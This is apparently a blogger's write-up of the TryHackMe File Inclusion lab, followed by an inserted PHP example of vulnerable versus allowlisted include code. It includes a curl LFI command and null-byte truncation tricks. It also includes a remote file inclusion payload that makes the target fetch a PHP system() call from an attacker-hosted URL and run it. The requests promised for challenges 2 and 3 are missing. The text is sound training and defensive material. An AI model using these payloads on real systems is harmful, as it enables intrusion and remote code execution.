THM — File Inclusion WriteUp

The File Inclusion room on TryHackMe teaches file inclusion vulnerabilities. It is part of the Junior Penetration Tester path, under the Introduction to Web Hacking category. This WriteUp contains solutions for the 4 challenges at the end of the room.

Challenge 1

The POST parameter “file” is vulnerable to Local File Inclusion (LFI). The flag can be retrieved with the following command:

curl http://10.10.179.245/challenges/chall1.php  -X POST -d "file=/etc/flag1"

Challenge 2

The THM cookie parameter is vulnerable to LFI. The word “Admin” must be present in the cookie value, but otherwise the user input is not filtered. The string “.php” is appended to the input, so a null byte (“%00”) is required to truncate the path and include the flag:

Challenge 3

When the request type is changed to POST, the file parameter becomes vulnerable to LFI. It is also important to terminate the file parameter with a null byte (%00). Flag 3 can be retrieved with the following request:

Challenge 4

The file parameter at /playground.php is vulnerable to Remote File Inclusion (RFI). With this vulnerability it is possible to execute arbitrary commands. A file called “cmd” with the following contents was hosted on the attacker machine:

<?PHP system("hostname"); ?>

The file could be retrieved via the following URL:

http://<attacker_ip>:4444/cmd

Requesting the following URL with a GET request then executed the PHP code on the target:

http://10.10.179.245/playground.php?file=http://<attacker_ip>:4444/cmd
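All four challenges come down to the same coding pattern. As an added illustration that is not part of the room or this write-up, the snippet below shows that pattern in PHP next to a hardened version that maps the parameter onto a fixed allowlist and logs rejected values; the page names, paths and helper names are assumptions, and PHP 8 is assumed for str_contains and str_starts_with.

```php
<?php
// Added example, not code from the room or the write-up.
// The pattern behind all four challenges: user input is concatenated into
// an include path. The appended ".php" is why the write-up needs %00 (a
// null byte) to truncate the path on older PHP builds, and a remote URL
// is fetched and executed wherever allow_url_include is enabled.
function include_vulnerable(string $file): void
{
    include $file . ".php";
}

// Hardened version: the parameter selects a key in a fixed map, so only
// these files can ever be included; traversal, null bytes, absolute paths
// and URL schemes never reach the file system. (Assumed names and paths.)
const PAGES = [
    'home'  => __DIR__ . '/pages/home.php',
    'about' => __DIR__ . '/pages/about.php',
];

function resolve_page(?string $name): ?string
{
    return ($name !== null && array_key_exists($name, PAGES)) ? PAGES[$name] : null;
}

function include_hardened(?string $name): void
{
    $path = resolve_page($name);
    if ($path === null) {
        http_response_code(404);
        error_log('file inclusion attempt rejected: ' . describe_attempt((string) $name));
        return;
    }
    include $path;
}

// Labels a rejected value for the log, so the attempts described in the
// write-up are visible to defenders rather than silently answered with 404.
function describe_attempt(string $in): string
{
    if (str_contains($in, "\0"))                              return 'null-byte truncation';       // challenges 2 and 3
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $in))         return 'remote file inclusion';      // challenge 4
    if (str_starts_with($in, '/') || str_contains($in, '..')) return 'absolute path or traversal'; // challenge 1
    return 'unknown page name';
}

// Constructed inputs modelled on the write-up's payloads.
foreach (['/etc/flag1', "../../etc/passwd\0", 'http://attacker.example/cmd', 'home'] as $in) {
    printf("%-30s -> %s\n", addcslashes($in, "\0"), resolve_page($in) ?? describe_attempt($in));
}
```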

Rabbit

Passionate about Cyber Security. I am publishing CTF writeups and Cybersecurity content!